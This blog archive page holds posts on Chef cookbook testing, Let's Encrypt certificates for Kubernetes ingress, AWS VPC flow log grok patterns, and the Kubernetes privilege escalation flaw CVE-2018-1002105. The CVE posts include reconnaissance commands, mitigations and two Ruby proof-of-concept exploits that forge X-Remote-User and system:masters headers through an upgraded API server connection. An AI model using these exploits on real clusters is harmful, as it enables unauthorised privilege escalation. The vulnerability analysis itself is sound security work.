Sunday, September 15, 2019

Testing/Writing Chef Cookbooks



Writing cookbooks

Cookbooks has attributes, recipes, templates etc


Using Community cookbooks
  1. Modify Berksfile in the cookbook by adding cookbook name, say, cookbook 'yum-centos', '~> 3.0.0'
  2. Modify metadata.rb in cookbook by updating dependencies, say, depends 'yum-centos', '~> 3.0.0'
  3. Execute below commands
$ berks install
$ berks upload
Prerequisites

Make sure we have below configs/files
  • Chef cookbook
  • Chef Environment
  • Chef Role
Testing cookbook locally

  1. Install vagrant from https://www.vagrantup.com/downloads.html
  2. Install Virtualbox
  3. Modify .kitchen.yml file referring to community cookbook recipe to test locally.
  4. Goto cookbook directory and execute kitchen commands to build, list, login to new created resource from chef cookbooks.
$ kitchen converge
$ kitchen list
$ kitchen login
Update authentication key
# Connect to chef server 
[pd@ip-disects ~]$ ssh -A -t SSH_SERVER_IP 

# Following commands are executed on chef server 
[pd@ip-disects ~]$ sudo chef-server-ctl user-create praveend Praveen Darshanam praveend@chef.io Myp@ssw0rd -f /tmp/praveend.key 
ERROR: Conflict 
Response: Username or email address already in use. 

[pd@ip-disects ~]$ sudo chef-server-ctl user-delete praveend 
Do you want to delete the user praveend? (Y/N) y 
Checking organization memberships... 
Checking admin group memberships for 1 org(s). 
FATAL: praveend is in the 'admins' group of the following organization(s): 
- disects



Run this command again with the --remove-from-admin-groups option to remove the user from these admin group(s) automatically. 
[pd@ip-disects ~]$ sudo chef-server-ctl user-delete praveend --remove-from-admin-groups 
Do you want to delete the user praveend? (Y/N) y 
Checking organization memberships... 
Checking admin group memberships for 1 org(s). 
Removing praveend from admins group of 'disects' 
Deleting user praveend. 

[pd@ip-disects ~]$ sudo chef-server-ctl user-create praveend Praveen Darshanam praveend@chef.io Myp@ssw0rd -f /tmp/praveend.key 
[pd@ip-disects ~]$ sudo chef-server-ctl org-user-add disects praveend --admin 
User praveend is added to admins and billing-admins group


Upload working cookbook to chef server after local testing. Test the cookbook on a cluster node to make sure everything is working fine, this needs some experience though.
$ knife cookbook upload cookbook_name


Kubernetes ingress custom Certificates with valid CA



Irrespective of ingress FQDN, Kubernetes creates Certificates with domain name ingress.local which creates below issues.
CoreOS Dex need certificates from valid CA, self-signed certificates will now work
Gardener dashboard authentication has issues with self-signed certificates. AuthN flow will not happen without accepting invalid Cert error
Accessing ingress in any browser will complain self-signed server error

Fix: Lets encrypt


Install Certbot from LetsEncrypt
$ brew install certbot

Create wildcard Certificate for domain, *.pd.example.com 

Before entering Yes to confirm, make sure you add TXT record entry as prompted by certbot.
# create directories named le_wd, le_cd, le_ld before executing below command
$ certbot certonly --manual -d *.pd.example.com  --work-dir=le_wd --config-dir=le_cd --logs-dir=le_ld 

# Check if certificates are created
$ certbot certificates --work-dir=le_wd --config-dir=le_cd --logs-dir=le_ld

Certs are located at le_cd/live/pd.example.com /


Create secret with the Certificates we want to use
$ kubectl create secret tls pd-custom-certs --key pd.example.com.key --cert pd.example.com.crt -n namespace_of_interest


Configure ingress with the TLS secret.
----SNIP(FQDN 1)---- ingress: enabled: true path: / hosts: - a.pd.example.com tls: - hosts: - a.pd.example.com secretName: pd-custom-certs ----SNIP(FQDN 2)---- ingress: enabled: true path: / hosts: - b.pd.example.com tls: - secretName: pd-custom-certs hosts: - b.pd.example.com

Accessing ingress should not show invalid Cert errors now.

Kubernetes Pod Security Policies



Start minikube with RBAC and admission-plugins enabled
$ minikube start --extra-config=apiserver.authorization-mode=Node,RBAC --extra-config=apiserver.enable-admission-plugins=PodSecurityPolicy
# or
$ minikube start --extra-config=apiserver.authorization-mode=Node,RBAC --extra-config=apiserver.Admission.PluginNames=PodSecurityPolicy

These commands are not working on my Mac machine, looks like API Server issue as it is not accepting any requests (might not be up).

Create namespace and Service Account
$ kubectl create namespace praveend-psp kubectl create sa test-psp-sa -n praveend-psp

Policy definitions

Friday, December 21, 2018

Exploiting Kubernetes Privilege Escalation (CVE-2018-1002105)

According to github vulnerability page [02], it can be exploited in two ways
  • Aggregated API Servers configured
  • Grant Pod attach/exec/portforward permissions

Aggregated API Servers

List of aggregated API servers configured in the cluster

$ kubectl get apiservices -o 'jsonpath={range .items[?(@.spec.service.name!="")]}{.metadata.name}{"\n"}{end}'
v1beta1.metrics.k8s.io
v1beta1.servicecatalog.k8s.io

Most of the time metrics aggregation service comes from the vendors and installed by default on kubernetes clusters. Service Catalog is installed by cluster admins based on requirements.

Metrics server details

$ kubectl get apiservices v1beta1.metrics.k8s.io -o json
{
    "apiVersion": "apiregistration.k8s.io/v1",
    "kind": "APIService",
    "metadata": {
        "annotations": {
            "kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"apiregistration.k8s.io/v1beta1\",\"kind\":\"APIService\",\"metadata\":{\"annotations\":{},\"labels\":{\"addonmanager.kubernetes.io/mode\":\"Reconcile\",\"kubernetes.io/minikube-addons\":\"metrics-server\"},\"name\":\"v1beta1.metrics.k8s.io\",\"namespace\":\"\"},\"spec\":{\"group\":\"metrics.k8s.io\",\"groupPriorityMinimum\":100,\"insecureSkipTLSVerify\":true,\"service\":{\"name\":\"metrics-server\",\"namespace\":\"kube-system\"},\"version\":\"v1beta1\",\"versionPriority\":100}}\n"
        },
        "creationTimestamp": "2018-12-18T21:52:00Z",
        "labels": {
            "addonmanager.kubernetes.io/mode": "Reconcile",
            "kubernetes.io/minikube-addons": "metrics-server"
        },
        "name": "v1beta1.metrics.k8s.io",
        "resourceVersion": "13945",
        "selfLink": "/apis/apiregistration.k8s.io/v1/apiservices/v1beta1.metrics.k8s.io",
        "uid": "25c4530a-030f-11e9-8cd1-0800276668cf"
    },
    "spec": {
        "caBundle": null,
        "group": "metrics.k8s.io",
        "groupPriorityMinimum": 100,
        "insecureSkipTLSVerify": true,
        "service": {
            "name": "metrics-server",
            "namespace": "kube-system"
        },
        "version": "v1beta1",
        "versionPriority": 100
    },
    "status": {
        "conditions": [
            {
                "lastTransitionTime": "2018-12-19T20:25:23Z",
                "message": "all checks passed",
                "reason": "Passed",
                "status": "True",
                "type": "Available"
            }
        ]
    }
}

Catalog server details

$ kubectl get apiservices v1beta1.servicecatalog.k8s.io -o json
{
    "apiVersion": "apiregistration.k8s.io/v1",
    "kind": "APIService",
    "metadata": {
        "creationTimestamp": "2018-12-19T21:47:13Z",
        "name": "v1beta1.servicecatalog.k8s.io",
        "resourceVersion": "16958",
        "selfLink": "/apis/apiregistration.k8s.io/v1/apiservices/v1beta1.servicecatalog.k8s.io",
        "uid": "a5162df4-03d7-11e9-b1ef-0800276668cf"
    },
    "spec": {
        "caBundle": "LS0tLS1...URS0tLS0tCg==",
        "group": "servicecatalog.k8s.io",
        "groupPriorityMinimum": 10000,
        "service": {
            "name": "catalog-catalog-apiserver",
            "namespace": "catalog"
        },
        "version": "v1beta1",
        "versionPriority": 20
    },
    "status": {
        "conditions": [
            {
                "lastTransitionTime": "2018-12-19T21:48:27Z",
                "message": "all checks passed",
                "reason": "Passed",
                "status": "True",
                "type": "Available"
            }
        ]
    }
}


Resources under different aggregated API's

$ kubectl api-resources | grep -i garden.sapcloud.io
backupinfrastructures             backupinfra   garden.sapcloud.io             true         BackupInfrastructure
cloudprofiles                                   garden.sapcloud.io             false        CloudProfile
projects                                        garden.sapcloud.io             false        Project
quotas                            squota        garden.sapcloud.io             true         Quota
secretbindings                    sb            garden.sapcloud.io             true         SecretBinding
seeds                                           garden.sapcloud.io             false        Seed
shoots                                          garden.sapcloud.io             true         Shoot

$ kubectl api-resources | grep -i metrics.k8s.io
nodes                                           metrics.k8s.io                 false        NodeMetrics

pods                                            metrics.k8s.io                 true         PodMetrics

$ kubectl api-resources | grep -iE "servicecatalog.k8s.io|namespace"
NAME                              SHORTNAMES   APIGROUP                       NAMESPACED   KIND
clusterservicebrokers                          servicecatalog.k8s.io          false        ClusterServiceBroker
clusterserviceclasses                          servicecatalog.k8s.io          false        ClusterServiceClass
clusterserviceplans                            servicecatalog.k8s.io          false        ClusterServicePlan
servicebindings                                servicecatalog.k8s.io          true         ServiceBinding
servicebrokers                                 servicecatalog.k8s.io          true         ServiceBroker
serviceclasses                                 servicecatalog.k8s.io          true         ServiceClass
serviceinstances                               servicecatalog.k8s.io          true         ServiceInstance

serviceplans                                   servicecatalog.k8s.io          true         ServicePlan

According to Kubernetes Github vulnerability description:
With a specially crafted request, users that are authorized to establish a connection through the Kubernetes API server to a backend server can then send arbitrary requests over the same connection directly to that backend, authenticated with the Kubernetes API server’s TLS credentials used to establish the backend connection.

Service Accounts/Users

Default service-accounts inside a kubernetes cluster
$ kubectl get sa --all-namespaces
NAMESPACE     NAME                                 SECRETS   AGE
catalog       default                              1         1h
catalog       service-catalog-apiserver            1         1h
catalog       service-catalog-controller-manager   1         1h
default       default                              1         1d
kube-public   default                              1         1d
kube-system   attachdetach-controller              1         1d
kube-system   bootstrap-signer                     1         1d
kube-system   certificate-controller               1         1d
kube-system   clusterrole-aggregation-controller   1         1d
kube-system   cronjob-controller                   1         1d
kube-system   daemon-set-controller                1         1d
kube-system   default                              1         1d
kube-system   deployment-controller                1         1d
kube-system   disruption-controller                1         1d
kube-system   endpoint-controller                  1         1d
kube-system   generic-garbage-collector            1         1d
kube-system   horizontal-pod-autoscaler            1         1d
kube-system   job-controller                       1         1d
kube-system   kube-dns                             1         1d
kube-system   kube-proxy                           1         1d
kube-system   namespace-controller                 1         1d
kube-system   nginx-ingress                        1         1d
kube-system   node-controller                      1         1d
kube-system   persistent-volume-binder             1         1d
kube-system   pod-garbage-collector                1         1d
kube-system   pv-protection-controller             1         1d
kube-system   pvc-protection-controller            1         1d
kube-system   replicaset-controller                1         1d
kube-system   replication-controller               1         1d
kube-system   resourcequota-controller             1         1d
kube-system   service-account-controller           1         1d
kube-system   service-controller                   1         1d
kube-system   statefulset-controller               1         1d
kube-system   storage-provisioner                  1         1d
kube-system   token-cleaner                        1         1d
kube-system   ttl-controller                       1         1d
pd            default                              1         1d

These service accounts can also be accessed in the form
system:serviceaccount:my-namespace:my-serviceaccount-name
for example system:serviceaccount:kube-system:horizontal-pod-autoscaler


Permissions

Check want permissions a service account has
$ kubectl auth can-i create pods --all-namespaces
yes
$ kubectl auth can-i create pods --all-namespaces --as system:serviceaccount:kube-system:horizontal-pod-autoscaler
no
$ kubectl auth can-i create pods --all-namespaces --as system:serviceaccount:kube-system:default
yes
$ kubectl auth can-i exec pods --all-namespaces --as system:serviceaccount:catalog:service-catalog-controller-manager
no
$ kubectl auth can-i exec pods --all-namespaces --as system:serviceaccount:kube-system:default
yes


API Server

API Server admission controller parameters
$ kubectl get po kube-apiserver-minikube -n kube-system -o yaml
....
spec:
  containers:
  - command:
    - kube-apiserver
    - --admission-control=Initializers,NamespaceLifecycle,LimitRanger,ServiceAccount,DefaultStorageClass,DefaultTolerationSeconds,NodeRestriction,MutatingAdmissionWebhook,ValidatingAdmissionWebhook,ResourceQuota
    - --insecure-port=0
    - --requestheader-group-headers=X-Remote-Group
    - --requestheader-extra-headers-prefix=X-Remote-Extra-
    - --client-ca-file=/var/lib/minikube/certs/ca.crt
    - --tls-cert-file=/var/lib/minikube/certs/apiserver.crt
    - --kubelet-client-key=/var/lib/minikube/certs/apiserver-kubelet-client.key
    - --proxy-client-cert-file=/var/lib/minikube/certs/front-proxy-client.crt
    - --proxy-client-key-file=/var/lib/minikube/certs/front-proxy-client.key
    - --secure-port=8443
    - --enable-bootstrap-token-auth=true
    - --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
    - --requestheader-username-headers=X-Remote-User
    - --service-account-key-file=/var/lib/minikube/certs/sa.pub
    - --requestheader-client-ca-file=/var/lib/minikube/certs/front-proxy-ca.crt
    - --allow-privileged=true
    - --requestheader-allowed-names=front-proxy-client
    - --advertise-address=192.168.99.100
    - --service-cluster-ip-range=10.96.0.0/12
    - --tls-private-key-file=/var/lib/minikube/certs/apiserver.key
    - --kubelet-client-certificate=/var/lib/minikube/certs/apiserver-kubelet-client.crt
    - --authorization-mode=Node,RBAC
    - --etcd-servers=https://127.0.0.1:2379
    - --etcd-cafile=/var/lib/minikube/certs/etcd/ca.crt
    - --etcd-certfile=/var/lib/minikube/certs/apiserver-etcd-client.crt
    - --etcd-keyfile=/var/lib/minikube/certs/apiserver-etcd-client.key

To find out clusters API Server details
$ kubectl cluster-info
Kubernetes master is running at https://192.168.99.100:8443
KubeDNS is running at https://192.168.99.100:8443/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy


PoC/Exploit

There are two exploits available in the wild based on "Aggregated API Servers", no PoC's we found leveraging "Grant Pod attach/exec/portforward permissions".


Exploit 1: source [03]

#!/usr/bin/env ruby

require 'socket'
require 'openssl'
require 'json'

host = 'kubernetes'
metrics = '/apis/metrics.k8s.io/v1beta1'

sock = TCPSocket.new host, 8443
ssl = OpenSSL::SSL::SSLSocket.new sock
ssl.sync_close = true
ssl.connect

ssl.puts "GET #{metrics} HTTP/1.1\r\nHost: #{host}\r\nUpgrade: WebSocket\r\nConnection: upgrade\r\n\r\n"
6.times { puts ssl.gets }
ssl.puts "GET #{metrics}/pods HTTP/1.1\r\nHost: #{host}\r\nX-Remote-User: system:serviceaccount:kube-system:horizontal-pod-autoscaler\r\n\r\n"
6.times { puts ssl.gets }

puts JSON.pretty_generate JSON.parse ssl.gets
ssl.close




Exploit 2: based on [04]

#!/usr/bin/env ruby

require 'socket'
require 'openssl'
require 'json'

host = 'kubernetes'
scatalog = '/apis/servicecatalog.k8s.io'

sock = TCPSocket.new host, 8443
ssl = OpenSSL::SSL::SSLSocket.new sock
ssl.sync_close = true
ssl.connect

ssl.puts "GET #{scatalog} HTTP/1.1\r\nHost: #{host}\r\nUpgrade: WebSocket\r\nConnection: upgrade\r\n\r\n"
6.times { puts ssl.gets }
ssl.puts "GET #{scatalog}/clusterservicebrokers HTTP/1.1\r\nHost: #{host}\r\nX-Remote-User: cluster-admin\r\nX-Remote-Group: system:masters\r\nX-Remote-Group: system:authenticated\r\n\r\n"

6.times { puts ssl.gets }

puts JSON.pretty_generate JSON.parse ssl.gets
ssl.close

References

[01] http://blog.disects.com/2018/12/kubernetes-privilege-escalation-cve.html
[02] https://github.com/kubernetes/kubernetes/issues/71411
[03] https://www.twistlock.com/labs-blog/demystifying-kubernetes-cve-2018-1002105-dead-simple-exploit/
[04] https://github.com/evict/poc_CVE-2018-1002105

Friday, December 7, 2018

Kubernetes Privilege Escalation (CVE-2018-1002105)

Introduction

Kubernetes is an open source production grade container orchestration system for deploying and managing docker/container applications. There are managed kubernetes orchestration service providers like Amazon Elastic Container Service for Kubernetes (EKS), Azure Kubernetes Service (AKS) etc.

kubectl

Kubernetes cluster users can perform management tasks using kubectl binary which talks to API Server. Example kubectl commands

# display pod resource
kubectl get pods -n my_namespace

# Execute a command in a container
kubectl -n my_namespace exec -it pods_name -- sh


# Listen on ports 5000 and 6000 locally, forwarding data to/from ports 5000 and 6000 in the pod
kubectl -n my_namespace port-forward pod/mypod 5000 6000

# Get output from ruby-container from pod my-pod-pd

kubectl attach my-pod-pd -c ruby-container


kubectl execution flow (source: 1ambda.github.io)


kubelet

kubelet, kube-proxy run's on each compute node (VM, Worker, EC2 Instance etc), kubelet listens on TCP port 10250 and 10255 (with no authentication/authorization). API Server acts as Reverse Proxy to kubelet and API Aggregation. API Server connects to the kubelet to fulfill commands like exec, port=forward and opens a websocket connection which connects stdin, stdout, or stderr to user’s original call [01].

API Aggregation

Installing or writing additional API's into Kubernetes API Server i.e. extending core API Server

Vulnerability

Vulnerability is in Kubernetes API Server, crafted request can execute arbitrary commands on the backend servers (pods) through the same channel client established to backend through API Server [02]

Check nodes Kubernetes version
$ kubectl get nodes -o wide
NAME        STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME
pd-worker-01 Ready node 13d v1.12.3 10.250.0.6 Container Linux by CoreOS 1745.7.0 (Rhyolite) 4.14.48-coreos-r2 docker://18.3.1
pd-worker-02 Ready node 13d v1.12.3 10.250.0.5 Container Linux by CoreOS 1745.7.0 (Rhyolite) 4.14.48-coreos-r2 docker://18.3.1
pd-worker-03 Ready node 13d v1.12.3 10.250.0.4 Container Linux by CoreOS 1745.7.0 (Rhyolite) 4.14.48-coreos-r2 docker://18.3.1


Vulnerable API Servers

If API server response looks as bellow and using vulnerable API versions of Kubernetes the you are vulnerable using anonymous-user escalation, patch Kubernetes immediately.
HTTP response error code 403 indicates Forbidden i.e. related to Authorization implies we successfully passed through Authentication phase.
{ "kind": "Status", "apiVersion": "v1", "metadata": { }, "status": "Failure", "message": "forbidden: User \"system:anonymous\" cannot get path \"/api/v1/\"", "reason": "Forbidden", "details": { }, "code": 403 }


anonymous user

By default, requests to the kubelet’s HTTPS endpoint that are not rejected by other configured authentication methods are treated as anonymous requests, and given a username of system:anonymous and a group of system:unauthenticated.

Mitigations

There are three levels of escalation mitigations

1. anonymous user -> aggregated API server

API Server admission-controller parameter anonymous-auth is set to fault
$ kubectl get po kube-apiserver-01 -n prod -o yaml | grep -i "anonymous-auth" - --anonymous-auth=false 
$ kubectl get po kube-apiserver-01 -n stage -o yaml | grep -i "anonymous-auth" - --anonymous-auth=false


2. authenticated user -> aggregated API server

Suspend aggregated API servers usage


3. authorized pod exec/attach/portforward -> kubelet API

Remove pod exec/attach/portforward permissions for users


References

[01]. https://docs.openshift.com/container-platform/3.11/architecture/networking/remote_commands.html
[02]. https://docs.openshift.com/container-platform/3.11/architecture/networking/remote_commands.html
[03]. https://elastisys.com/2018/12/04/kubernetes-critical-security-flaw-cve-2018-1002105/
[04]. https://github.com/kubernetes/kubernetes/issues/71411



Saturday, January 20, 2018

AWS VPC Flow Logs grok Pattern


Amazon Web Services(AWS) can generate VPC flow logs, format below
2 123456789010 eni-abc123de 172.31.9.69 172.31.9.12 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK

For more information on flow logs and grok filter plugin refer below links
https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/flow-logs.html
https://www.elastic.co/guide/en/logstash/current/plugins-filters-grok.html

grok patterns can be tested using below links
http://grokdebug.herokuapp.com
http://grokconstructor.appspot.com/do/match#result

%{NONNEGINT:version} %{NONNEGINT:accountid} %{NOTSPACE:interface-id} %{NOTSPACE:srcaddr} %{NOTSPACE:dstaddr} %{NONNEGINT:srcport} %{NONNEGINT:dstport} %{NONNEGINT:protocol} %{NONNEGINT:packets} %{NONNEGINT:bytes} %{NONNEGINT:starttime} %{NONNEGINT:endtime} %{NOTSPACE:action} %{NOTSPACE:log-status}

Test using grokdebugger

Test using grokconstructor

You can also consider INT instead of NONNEGINT


Found few patterns by googling which looked like below, were not working on grokconstructor website.
%{NUMBER:version} %{NUMBER:account-id} %{NOTSPACE:interface-id} %{NOTSPACE:srcaddr} %{NOTSPACE:dstaddr} %{NOTSPACE:srcport:int} %{NOTSPACE:dstport:int} %{NOTSPACE:protocol:int} %{NOTSPACE:packets:int} %{NOTSPACE:bytes:int} %{NUMBER:start:int} %{NUMBER:end:int} %{NOTSPACE:action} %{NOTSPACE:log-status}

Tested on grokdebugger


Tested on grokconstructor

We can use the extracted variables from grok filter plugin in Kibana search or enhance data using logstash filter plugins geoip, dns, date etc.